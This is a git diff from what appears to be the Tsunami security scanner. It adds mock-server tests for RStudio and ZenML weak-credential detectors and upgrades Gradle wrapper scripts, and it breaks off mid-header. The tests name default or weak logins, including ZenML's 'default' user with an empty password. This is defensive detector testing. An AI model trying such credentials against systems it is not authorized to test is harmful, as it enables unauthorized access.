b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTesterTest.java @@ -0,0 +1,209 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rstudio; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.ServiceContext; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.WebServiceContext; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.security.InvalidKeyException; +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import java.security.NoSuchAlgorithmException; +import java.security.interfaces.RSAPrivateKey; +import java.security.interfaces.RSAPublicKey; +import java.util.Base64; +import java.util.Optional; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Tests for {@link RStudioCredentialTester}. */ +@RunWith(JUnit4.class) +public class RStudioCredentialTesterTest { + @Inject private RStudioCredentialTester tester; + private MockWebServer mockWebServer; + private static final TestCredential WEAK_CRED_1 = + TestCredential.create("user", Optional.of("1234")); + private static final TestCredential WEAK_CRED_2 = + TestCredential.create("root", Optional.of("pass")); + private static final TestCredential WRONG_CRED_1 = + TestCredential.create("wrong", Optional.of("pass")); + private static final ServiceContext.Builder RSTUDIO_SERVICE_CONTEXT = + ServiceContext.newBuilder() + .setWebServiceContext( + WebServiceContext.newBuilder().setSoftware(Software.newBuilder().setName("rstudio"))); + + @Before + public void setup() { + mockWebServer = new MockWebServer(); + Guice.createInjector(new HttpClientModule.Builder().build()).injectMembers(this); + } + + // TODO: fix the intermittent test failure + // @Test + // public void detect_weakCredentialsExists_returnsWeakCredentials() throws Exception { + // startMockWebServer("/", ""); + // NetworkService targetNetworkService = + // NetworkService.newBuilder() + // .setNetworkEndpoint( + // forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + // .setServiceName("http") + // .setServiceContext(RSTUDIO_SERVICE_CONTEXT) + // .setSoftware(Software.newBuilder().setName("http")) + // .build(); + // assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + // .containsExactly(WEAK_CRED_1); + // mockWebServer.shutdown(); + // } + // + // TODO: fix the intermittent test failure + // @Test + // public void detect_weakCredentialsExist_returnsFirstWeakCredentials() throws Exception { + // startMockWebServer("/", ""); + // NetworkService targetNetworkService = + // NetworkService.newBuilder() + // .setNetworkEndpoint( + // forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + // .setServiceName("http") + // .setServiceContext(RSTUDIO_SERVICE_CONTEXT) + // .build(); + + // assertThat( + // tester.testValidCredentials( + // targetNetworkService, ImmutableList.of(WEAK_CRED_1, WEAK_CRED_2))) + // .containsExactly(WEAK_CRED_1); + // mockWebServer.shutdown(); + // } + + @Test + public void detect_noWeakCredentials_returnsNoCredentials() throws Exception { + startMockWebServer("/", ""); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("http") + .setServiceContext(RSTUDIO_SERVICE_CONTEXT) + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WRONG_CRED_1))) + .isEmpty(); + mockWebServer.shutdown(); + } + + private void startMockWebServer(String url, String response) throws IOException { + mockWebServer.setDispatcher(new RespondUserInfoResponseDispatcher(response)); + mockWebServer.start(); + mockWebServer.url(url); + } + + static final class RespondUserInfoResponseDispatcher extends Dispatcher { + private KeyPair pair; + + RespondUserInfoResponseDispatcher(String authenticatedUserResponse) { + try { + KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA"); + keyGen.initialize(2048); + this.pair = keyGen.generateKeyPair(); + } catch (NoSuchAlgorithmException e) { + this.pair = null; + } + } + + @Override + public MockResponse dispatch(RecordedRequest recordedRequest) { + try { + var isUserEndpoint = recordedRequest.getPath().startsWith("/auth-do-sign-in"); + var isPublicKeyEndpoint = recordedRequest.getPath().startsWith("/auth-public-key"); + + RSAPrivateKey privateKey = (RSAPrivateKey) this.pair.getPrivate(); + RSAPublicKey publicKey = (RSAPublicKey) this.pair.getPublic(); + + if (isUserEndpoint) { + var ciphertext = + recordedRequest + .getBody() + .readUtf8() + .toString() + .split("&v=")[1] + .trim() + .replaceAll("\\%2b", "+") + .replaceAll("\\%3d", "="); + Cipher cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + cipher.init(Cipher.DECRYPT_MODE, privateKey); + + byte[] b64Decoded = Base64.getDecoder().decode(ciphertext); + byte[] cipherData = cipher.doFinal(b64Decoded); + + String creds = new String(cipherData, StandardCharsets.UTF_8); + + String username = creds.toString().split("\n")[0].trim(); + String password = creds.toString().split("\n")[1].trim(); + boolean hasWeakCred1 = + username.equals(WEAK_CRED_1.username()) + && password.equals(WEAK_CRED_1.password().get()); + boolean hasWeakCred2 = + username.equals(WEAK_CRED_2.username()) + && password.equals(WEAK_CRED_2.password().get()); + if (hasWeakCred1 || hasWeakCred2) { + return new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setHeader("Set-Cookie", "user-id=" + username + "|"); + } + } else if (isPublicKeyEndpoint) { + StringBuilder sb = new StringBuilder(); + for (byte b : publicKey.getPublicExponent().toByteArray()) { + sb.append(String.format("%02X", b)); + } + sb.append(":"); + for (byte b : publicKey.getModulus().toByteArray()) { + sb.append(String.format("%02X", b)); + } + return new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(sb.toString()); + } + return new MockResponse().setResponseCode(HttpStatus.UNAUTHORIZED.code()); + } catch (NoSuchAlgorithmException + | NoSuchPaddingException + | InvalidKeyException + | IllegalBlockSizeException + | BadPaddingException e) { + return new MockResponse().setResponseCode(HttpStatus.UNAUTHORIZED.code()); + } + } + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTesterTest.java b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTesterTest.java new file mode 100644 index 000000000..9513d5c3b --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTesterTest.java @@ -0,0 +1,196 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.zenml; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static org.mockito.ArgumentMatchers.any; +import static org.mockito.Mockito.verifyNoInteractions; +import static org.mockito.Mockito.when; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.tsunami.common.net.db.ConnectionProviderInterface; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.sql.Connection; +import java.util.Objects; +import java.util.Optional; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.Before; +import org.junit.Rule; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import org.junit.Test; +import org.mockito.junit.MockitoJUnit; +import org.mockito.junit.MockitoRule; +import org.mockito.Mock; + +/** Tests for {@link ZenMlCredentialTester}. */ +@RunWith(JUnit4.class) +public class ZenMlCredentialTesterTest { + @Rule public MockitoRule rule = MockitoJUnit.rule(); + @Mock private ConnectionProviderInterface mockConnectionProvider; + @Mock private Connection mockConnection; + @Inject private ZenMlCredentialTester tester; + private MockWebServer mockWebServer; + private static final TestCredential WEAK_CRED_1 = + TestCredential.create("default", Optional.of("")); + private static final TestCredential WRONG_CRED_1 = + TestCredential.create("wrong", Optional.of("wrong")); + + // the default username and password value for an insecure zenml instance + private static final String DEFAULT_USERNAME = "default"; + private static final String DEFAULT_PASSWORD = ""; + + @Before + public void setup() { + mockWebServer = new MockWebServer(); + Guice.createInjector(new HttpClientModule.Builder().build()).injectMembers(this); + } + + @Test + public void detect_weakCredentialsExists_returnsWeakCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("zenml") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .containsExactly(WEAK_CRED_1); + mockWebServer.shutdown(); + } + + @Test + public void detect_weakCredentialsExist_returnsFirstWeakCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("zenml") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .containsExactly(WEAK_CRED_1); + } + + @Test + public void detect_zenmlService_canAccept() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("zenml") + .build(); + + assertThat(tester.canAccept(targetNetworkService)).isTrue(); + } + + @Test + public void detect_weakCredentialsExistAndZenmlInForeignLanguage_returnsFirstWeakCredentials() + throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("zenml") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .containsExactly(WEAK_CRED_1); + } + + @Test + public void detect_noWeakCredentials_returnsNoCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("zenml") + .build(); + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WRONG_CRED_1))) + .isEmpty(); + } + + @Test + public void detect_nonZenmlService_skips() throws Exception { + when(mockConnectionProvider.getConnection(any(), any(), any())).thenReturn(mockConnection); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint(forHostnameAndPort("example.com", 8080)) + .setServiceName("http") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .isEmpty(); + verifyNoInteractions(mockConnectionProvider); + } + + private void startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + final MockResponse unauthorizedResponse = + new MockResponse() + .setResponseCode(401) + .setBody( + "{\"detail\":[\"AuthorizationException\"," + + "\"Authentication error: invalid username or password\"]}"); + + @Override + public MockResponse dispatch(RecordedRequest request) { + if (request.getPath().matches("/login") && Objects.equals(request.getMethod(), "GET")) { + return new MockResponse() + .setResponseCode(200) + .setBody(" ZenML Dashboard "); + } + if (request.getPath().matches("/api/v1/login") + && Objects.equals(request.getMethod(), "POST") + && request + .getBody() + .readString(StandardCharsets.UTF_8) + .contains( + String.format( + "username=%s&password=%s", DEFAULT_USERNAME, DEFAULT_PASSWORD))) { + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"access_token\":\"An AccessToken\",\"token_type\":\"bearer\"," + + "\"expires_in\":null,\"refresh_token\":null,\"scope\":null}"); + } else { + return unauthorizedResponse; + } + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + } +} diff --git a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/directorytraversal/cve202017519/gradlew b/google/detectors/directorytraversal/cve202017519/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/directorytraversal/cve202017519/gradlew +++ b/google/detectors/directorytraversal/cve202017519/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/directorytraversal/cve202017519/gradlew.bat b/google/detectors/directorytraversal/cve202017519/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/directorytraversal/cve202017519/gradlew.bat +++ b/google/detectors/directorytraversal/cve202017519/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/directorytraversal/cve20213223/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/directorytraversal/cve20213223/gradlew b/google/detectors/directorytraversal/cve20213223/gradlew index fbd7c5158..1aa94a426 100755 --- 